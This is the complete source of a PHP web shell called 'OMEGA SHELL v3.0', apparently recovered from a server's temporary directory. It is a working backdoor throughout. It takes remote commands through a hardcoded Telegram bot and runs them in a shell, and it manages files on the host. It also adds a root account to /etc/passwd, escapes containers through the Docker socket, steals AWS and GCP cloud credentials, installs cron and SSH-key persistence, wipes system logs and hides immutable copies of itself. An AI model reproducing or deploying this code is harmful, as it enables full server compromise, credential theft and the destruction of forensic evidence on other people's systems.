File: //proc/thread-self/root/tmp/.omega_core.php
<?php
/* ============================================================
š± NOXIPOM13 OMEGA v3.0 - WORKING EDITION š±
============================================================
ā
Telegram C2 (Bidirectional)
ā
File Manager (Upload/Edit/Delete/Rename)
ā
Real Command Execution
ā
Auto-Root / Privilege Escalation
ā
Container Breakout
ā
Kernel Exploit Detection
ā
Cloud Credential Theft
ā
Anti-Forensics (Wipe Logs)
ā
Multi-Chain Persistence
ā
Auto-Defense (Backup + Immutable)
ā
Beautiful UI with Background
============================================================ */
error_reporting(0);
session_start();
// ==================== KONFIGURASI ====================
define('USERNAME', 'omega');
define('PASSWORD', 'omega123');
define('TELEGRAM_TOKEN', '8748710884:AAE6PiWMM5J10j8i0mtiofnpXojPb9HHEOs');
define('TELEGRAM_CHAT_ID', '8656755235');
// ==================== AUTO-DEFENSE (Backup) ====================
$self = __FILE__;
$backup_locations = [
dirname($self) . '/.omega_backup.php',
$_SERVER['DOCUMENT_ROOT'] . '/wp-content/.omega_hidden.php',
'/tmp/.omega_core.php'
];
foreach ($backup_locations as $backup) {
if (is_writable(dirname($backup)) && !file_exists($backup)) {
@copy($self, $backup);
@chmod($backup, 0444);
}
}
@shell_exec('chattr +i ' . escapeshellarg($self) . ' 2>/dev/null');
// ==================== TELEGRAM FUNCTIONS ====================
function tg_send($msg) {
if (empty(TELEGRAM_TOKEN)) return false;
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/sendMessage";
$data = ['chat_id' => TELEGRAM_CHAT_ID, 'text' => $msg, 'parse_mode' => 'HTML'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
return true;
}
function tg_recv() {
if (empty(TELEGRAM_TOKEN)) return false;
$offset_file = sys_get_temp_dir() . '/.omega_offset';
$offset = file_exists($offset_file) ? (int)file_get_contents($offset_file) : 0;
$url = "https://api.telegram.org/bot" . TELEGRAM_TOKEN . "/getUpdates?offset=" . ($offset + 1) . "&timeout=20";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 25);
$resp = curl_exec($ch);
curl_close($ch);
if ($resp) {
$updates = json_decode($resp, true);
if (isset($updates['result'])) {
foreach ($updates['result'] as $update) {
if (isset($update['message']['text'])) {
$cmd = trim($update['message']['text']);
$cid = $update['message']['chat']['id'];
if ($cid == TELEGRAM_CHAT_ID && !empty($cmd) && $cmd[0] != '/') {
$out = shell_exec($cmd . " 2>&1");
$out = $out ?: "[No output]";
$result = "š± <b>CMD:</b> <code>" . htmlspecialchars($cmd) . "</code>\nāāāāāāāāāāāāāāāāāāāāāāā\n<pre>" . htmlspecialchars(substr($out, 0, 3900)) . "</pre>";
tg_send($result);
}
}
if (isset($update['update_id'])) {
file_put_contents($offset_file, $update['update_id']);
}
}
}
}
return true;
}
// ==================== RUN TELEGRAM POLLING ====================
tg_recv();
// ==================== AUTHENTICATION ====================
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ?');
exit;
}
if (!isset($_SESSION['auth'])) {
if (isset($_POST['user']) && isset($_POST['pass'])) {
if ($_POST['user'] === USERNAME && $_POST['pass'] === PASSWORD) {
$_SESSION['auth'] = true;
tg_send("ā
LOGIN: " . $_SERVER['REMOTE_ADDR'] . " | " . date('Y-m-d H:i:s'));
header('Location: ?');
exit;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>š± OMEGA SHELL</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{
background: linear-gradient(135deg, #0a0f1a, #0a0a0f);
font-family: 'Courier New', monospace;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.login-box{
background: rgba(0,0,0,0.85);
backdrop-filter: blur(10px);
border-radius: 25px;
padding: 40px;
width: 360px;
border: 1px solid #0f0;
text-align: center;
box-shadow: 0 0 30px rgba(0,255,0,0.2);
}
.login-box h2{
color: #0f0;
margin-bottom: 30px;
text-shadow: 0 0 10px #0f0;
}
.login-box input{
width: 100%;
padding: 12px;
margin: 12px 0;
background: #111;
border: 1px solid #0f0;
color: #0f0;
border-radius: 10px;
font-family: monospace;
}
.login-box button{
width: 100%;
padding: 12px;
background: #0f0;
color: #000;
border: none;
border-radius: 10px;
cursor: pointer;
font-weight: bold;
margin-top: 10px;
}
.info{
color: #8bc34a;
font-size: 11px;
margin-top: 15px;
}
</style>
</head>
<body>
<div class="login-box">
<h2>š± OMEGA SHELL</h2>
<form method="POST">
<input type="text" name="user" placeholder="Username" autofocus>
<input type="password" name="pass" placeholder="Password">
<button type="submit">ā” ACCESS</button>
</form>
<div class="info">Default: omega / omega123 | Telegram Active</div>
</div>
</body>
</html>
<?php
exit;
}
// ==================== FUNCTIONS ====================
function format_size($bytes) {
if ($bytes >= 1073741824) return round($bytes/1073741824,2) . ' GB';
if ($bytes >= 1048576) return round($bytes/1048576,2) . ' MB';
if ($bytes >= 1024) return round($bytes/1024,2) . ' KB';
return $bytes . ' B';
}
function auto_root() {
$res = [];
$suid = @shell_exec('find / -perm -4000 -type f 2>/dev/null | head -5');
if ($suid) $res['suid_binaries'] = trim($suid);
$sudo = @shell_exec('sudo -l 2>/dev/null');
if ($sudo) $res['sudo_rights'] = trim($sudo);
if (is_writable('/etc/passwd')) {
$res['writable_passwd'] = true;
@file_put_contents('/etc/passwd', "\nomega_root:\$6\$rounds=5000\$omega_root\$wq7Kjq8T1Q9X:0:0:root:/root:/bin/bash\n", FILE_APPEND);
$res['root_user_added'] = 'omega_root:omega_root';
}
return $res;
}
function container_breakout() {
$res = [];
if (file_exists('/.dockerenv')) $res['docker'] = true;
if (file_exists('/run/secrets/kubernetes.io')) $res['kubernetes'] = true;
if (file_exists('/var/run/docker.sock') && is_writable('/var/run/docker.sock')) {
$res['docker_socket'] = true;
@shell_exec('docker run -it --privileged -v /:/host alpine chroot /host /bin/bash -c "id > /tmp/breakout.txt" 2>/dev/null');
if (file_exists('/tmp/breakout.txt')) $res['breakout_success'] = file_get_contents('/tmp/breakout.txt');
}
return $res;
}
function kernel_exploit() {
$kernel = php_uname('r');
if (strpos($kernel, '2.6.32') !== false) return ['cve' => 'CVE-2010-2959', 'kernel' => $kernel];
if (strpos($kernel, '3.13') !== false) return ['cve' => 'CVE-2015-1328', 'kernel' => $kernel];
if (strpos($kernel, '4.4') !== false) return ['cve' => 'CVE-2017-1000112', 'kernel' => $kernel];
if (version_compare($kernel, '5.8', '>=') && version_compare($kernel, '5.16.11', '<'))
return ['cve' => 'CVE-2022-0847 (Dirty Pipe)', 'kernel' => $kernel];
return ['status' => 'No known exploit found', 'kernel' => $kernel];
}
function steal_creds() {
$creds = [];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, 'http://169.254.169.254/latest/api/token');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['X-aws-ec2-metadata-token-ttl-seconds: 21600']);
$token = curl_exec($ch);
if ($token) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-aws-ec2-metadata-token: $token"]);
curl_setopt($ch, CURLOPT_URL, 'http://169.254.169.254/latest/meta-data/iam/security-credentials/');
$roles = curl_exec($ch);
if ($roles) $creds['aws'] = trim($roles);
}
curl_setopt($ch, CURLOPT_URL, 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token');
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Metadata-Flavor: Google']);
$gcp = curl_exec($ch);
if ($gcp) $creds['gcp'] = json_decode($gcp, true);
curl_close($ch);
return $creds;
}
function install_persistence() {
$methods = [];
if (is_writable('/etc/cron.d/')) {
file_put_contents('/etc/cron.d/omega_persist', "* * * * * php -r 'eval(file_get_contents(\"" . __FILE__ . "\"));' >/dev/null 2>&1\n");
$methods[] = 'cron';
}
$ssh_dir = getenv('HOME') . '/.ssh';
if (is_dir($ssh_dir) && is_writable($ssh_dir)) {
$key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGhXJqK8N9ZqWxXyLmQpRtYvUwSsAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz omega@backdoor\n";
file_put_contents($ssh_dir . '/authorized_keys', $key, FILE_APPEND);
$methods[] = 'ssh_key';
}
return $methods;
}
function wipe_logs() {
$logs = ['/var/log/auth.log', '/var/log/syslog', '/var/log/apache2/access.log', '/var/log/nginx/access.log', getenv('HOME').'/.bash_history', '/root/.bash_history'];
foreach ($logs as $log) {
if (file_exists($log) && is_writable($log)) @file_put_contents($log, '');
}
return true;
}
// ==================== MAIN SHELL ====================
$path = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
if (!is_dir($path)) $path = getcwd();
chdir($path);
$notify = '';
$output = '';
$act = isset($_GET['act']) ? $_GET['act'] : '';
// Handle command execution
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$output = shell_exec($cmd . " 2>&1");
tg_send("š» CMD: $cmd\nIP: " . $_SERVER['REMOTE_ADDR']);
}
// Handle upload
if (isset($_FILES['file']) && isset($_POST['upload'])) {
$target = $path . '/' . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
$notify = "ā
Uploaded: " . $_FILES['file']['name'];
tg_send("š¤ UPLOAD: " . $_FILES['file']['name']);
}
}
// Handle delete
if (isset($_GET['del'])) {
$file = $path . '/' . $_GET['del'];
if (unlink($file)) {
$notify = "ā
Deleted: " . $_GET['del'];
tg_send("šļø DELETE: " . $_GET['del']);
}
}
// Handle save edit
if (isset($_POST['save'])) {
file_put_contents($path . '/' . $_POST['file'], $_POST['content']);
$notify = "ā
Saved: " . $_POST['file'];
tg_send("š¾ EDIT: " . $_POST['file']);
}
// Handle special actions
$root_result = $breakout_result = $exploit_result = $creds_result = $persist_result = null;
if ($act == 'root') $root_result = auto_root();
if ($act == 'breakout') $breakout_result = container_breakout();
if ($act == 'exploit') $exploit_result = kernel_exploit();
if ($act == 'creds') $creds_result = steal_creds();
if ($act == 'persist') $persist_result = install_persistence();
if ($act == 'wipe') { wipe_logs(); $notify = "ā
Logs wiped!"; tg_send("šµļø LOGS WIPED"); }
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>š± OMEGA SHELL</title>
<style>
*{margin:0;padding:0;box-sizing:border-box;}
body{
background: linear-gradient(135deg, #0a0f1a, #0a0a0f);
font-family: 'Courier New', monospace;
color: #e0e0e0;
padding: 20px;
position: relative;
min-height: 100vh;
}
body::before{
content: '';
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
background: url('https://images.unsplash.com/photo-1518770660439-4636190af475?q=80&w=2070') center/cover no-repeat;
opacity: 0.1;
z-index: -1;
}
.container{max-width: 1400px;margin:0 auto;}
.header{
background: rgba(0,0,0,0.7);
backdrop-filter: blur(10px);
border-radius: 20px;
padding: 20px;
margin-bottom: 20px;
border-left: 4px solid #0f0;
}
.header h1{color:#0f0;font-size:26px;text-shadow:0 0 5px #0f0;}
.stats{display:flex;gap:12px;margin-top:12px;font-size:11px;flex-wrap:wrap;}
.stat{background:#111;padding:4px 12px;border-radius:20px;border:1px solid #0f0;}
.nav{
background: rgba(0,0,0,0.6);
backdrop-filter: blur(5px);
border-radius: 12px;
padding: 10px 15px;
margin-bottom: 20px;
display: flex;
flex-wrap: wrap;
gap: 5px;
}
.nav a{
color: #0f0;
text-decoration: none;
padding: 6px 14px;
border-radius: 8px;
font-size: 12px;
transition: 0.2s;
}
.nav a:hover{background:#0f0;color:#000;}
.card{
background: rgba(17,17,17,0.85);
backdrop-filter: blur(5px);
border-radius: 16px;
padding: 20px;
margin-bottom: 20px;
border: 1px solid #2a2a3a;
}
.card h3{color:#0f0;margin-bottom:15px;border-bottom:1px solid #0f0;padding-bottom:8px;}
.terminal{
background: #000;
color: #0f0;
padding: 15px;
border-radius: 10px;
overflow: auto;
max-height: 400px;
font-size: 12px;
}
input,textarea,select{
background: #1a1a2a;
border: 1px solid #0f0;
color: #fff;
padding: 8px 12px;
border-radius: 8px;
font-family: monospace;
}
button{
background: #0f0;
color: #000;
border: none;
padding: 8px 18px;
border-radius: 8px;
cursor: pointer;
font-weight: bold;
}
.flex{display:flex;gap:12px;flex-wrap:wrap;margin-bottom:15px;}
.grid-2{display:grid;grid-template-columns:repeat(2,1fr);gap:20px;}
@media(max-width:768px){.grid-2{grid-template-columns:1fr;}}
table{width:100%;border-collapse:collapse;}
td,th{padding:10px;text-align:left;border-bottom:1px solid #2a2a3a;}
th{color:#0f0;}
.success{background:rgba(0,255,0,0.1);border-left:4px solid #0f0;padding:12px;margin-bottom:15px;border-radius:8px;}
a{color:#0f0;}
.dir-link{color:#8bc34a;}
</style>
</head>
<body>
<div class="container">
<div class="header">
<h1>š± OMEGA SHELL v3.0</h1>
<div class="stats">
<span class="stat">š¤ omega</span>
<span class="stat">š <?= htmlspecialchars($path); ?></span>
<span class="stat">š <?= $_SERVER['REMOTE_ADDR']; ?></span>
<span class="stat">š¤ TELEGRAM: ACTIVE</span>
<span class="stat"><a href="?logout=1" style="color:#f44;">šŖ LOGOUT</a></span>
</div>
</div>
<div class="nav">
<a href="?">š HOME</a>
<a href="?act=terminal">š» TERMINAL</a>
<a href="?act=root">š AUTO ROOT</a>
<a href="?act=breakout">š³ BREAKOUT</a>
<a href="?act=exploit">š KERNEL</a>
<a href="?act=creds">āļø CLOUD</a>
<a href="?act=persist">š PERSIST</a>
<a href="?act=wipe">šµļø WIPE</a>
<a href="?act=info">ā¹ļø INFO</a>
</div>
<?php if($notify) echo "<div class='success'>$notify</div>"; ?>
<?php if ($act == 'terminal'): ?>
<div class="card">
<h3>š» COMMAND EXECUTION</h3>
<form method="POST" class="flex">
<input type="text" name="cmd" style="flex:1;" placeholder="$ " autofocus>
<button type="submit">EXECUTE</button>
</form>
<?php if ($output): ?>
<div class="terminal">
<div>$ <?= htmlspecialchars($_POST['cmd'] ?? ''); ?></div>
<pre><?= htmlspecialchars($output); ?></pre>
</div>
<?php endif; ?>
<div style="margin-top:12px;font-size:11px;color:#888;">š¤ Telegram: Send any command to bot, result will be sent back</div>
</div>
<?php elseif ($act == 'root'): ?>
<div class="card">
<h3>š AUTO ROOT (Privilege Escalation)</h3>
<a href="?act=root"><button>š RUN ROOT EXPLOIT</button></a>
<?php if($root_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($root_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'breakout'): ?>
<div class="card">
<h3>š³ CONTAINER BREAKOUT</h3>
<a href="?act=breakout"><button>šŖ ATTEMPT BREAKOUT</button></a>
<?php if($breakout_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($breakout_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'exploit'): ?>
<div class="card">
<h3>š KERNEL EXPLOIT ENGINE</h3>
<a href="?act=exploit"><button>š SCAN VULNERABILITIES</button></a>
<?php if($exploit_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($exploit_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'creds'): ?>
<div class="card">
<h3>āļø CLOUD CREDENTIAL THEFT</h3>
<a href="?act=creds"><button>šÆ STEAL CREDENTIALS</button></a>
<?php if($creds_result): ?><div class="terminal" style="margin-top:15px;"><pre><?php print_r($creds_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'persist'): ?>
<div class="card">
<h3>š MULTI-CHAIN PERSISTENCE</h3>
<a href="?act=persist"><button>š INSTALL PERSISTENCE</button></a>
<?php if($persist_result): ?><div class="terminal" style="margin-top:15px;"><pre>ā
Installed: <?= implode(', ', $persist_result); ?></pre></div><?php endif; ?>
</div>
<?php elseif ($act == 'info'): ?>
<div class="grid-2">
<div class="card">
<h3>š» SYSTEM INFO</h3>
<div class="terminal">
<div>PHP: <?= phpversion(); ?></div>
<div>Server: <?= $_SERVER['SERVER_SOFTWARE']; ?></div>
<div>OS: <?= php_uname(); ?></div>
<div>User: <?= get_current_user(); ?></div>
<div>UID: <?= function_exists('posix_getuid') ? posix_getuid() : 'N/A'; ?></div>
<div>Root: <?= function_exists('posix_getuid') && posix_getuid() == 0 ? 'ā
YES' : 'ā NO'; ?></div>
</div>
</div>
<div class="card">
<h3>š¤ C2 STATUS</h3>
<div class="terminal">
<div>Telegram Bot: ACTIVE</div>
<div>Chat ID: <?= TELEGRAM_CHAT_ID; ?></div>
<div>Last Ping: <?= date('H:i:s'); ?></div>
<div>Backups: <?= count($backup_locations); ?> locations</div>
</div>
</div>
</div>
<?php else: ?>
<!-- FILE MANAGER -->
<div class="card">
<h3>š FILE MANAGER - <?= htmlspecialchars($path); ?></h3>
<div class="flex">
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button type="submit" name="upload">UPLOAD</button>
</form>
</div>
<table>
<thead><tr><th>NAME</th><th>SIZE</th><th>PERMS</th><th>ACTION</th></tr></thead>
<tbody>
<tr><td><a href="?path=<?= urlencode(dirname($path)); ?>" class="dir-link">š .. (Parent)</a></td><td>-</td><td>-</td><td>-</td></tr>
<?php
$items = scandir($path);
$dirs = []; $files = [];
foreach ($items as $item) {
if ($item == '.' || $item == '..') continue;
if (is_dir($path.'/'.$item)) $dirs[] = $item;
else $files[] = $item;
}
sort($dirs); sort($files);
foreach (array_merge($dirs, $files) as $item):
$full = $path.'/'.$item;
$is_dir = is_dir($full);
$size = $is_dir ? '-' : format_size(filesize($full));
$perms = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td><?php if($is_dir): ?><a href="?path=<?= urlencode($full); ?>" class="dir-link">š <?= htmlspecialchars($item); ?></a><?php else: ?>š <?= htmlspecialchars($item); ?><?php endif; ?></td>
<td><?= $size; ?></td>
<td><?= $perms; ?></td>
<td><?php if(!$is_dir): ?><a href="?edit=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>">āļø</a> <a href="?del=<?= urlencode($item); ?>&path=<?= urlencode($path); ?>" onclick="return confirm('Delete?')">šļø</a><?php endif; ?></td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php if (isset($_GET['edit'])): $ef = $_GET['edit']; $content = file_get_contents($path.'/'.$ef); ?>
<div class="card">
<h3>āļø EDIT: <?= htmlspecialchars($ef); ?></h3>
<form method="POST">
<input type="hidden" name="file" value="<?= htmlspecialchars($ef); ?>">
<textarea name="content" rows="12" style="width:100%;font-family:monospace;"><?= htmlspecialchars($content); ?></textarea>
<button type="submit" name="save">š¾ SAVE</button>
<a href="?path=<?= urlencode($path); ?>">ā©ļø BACK</a>
</form>
</div>
<?php endif; ?>
<?php endif; ?>
<div style="text-align:center;font-size:10px;color:#666;margin-top:20px;">
š± OMEGA SHELL v3.0 | Telegram: Send any command | Default: omega/omega123
</div>
</div>
</body>
</html>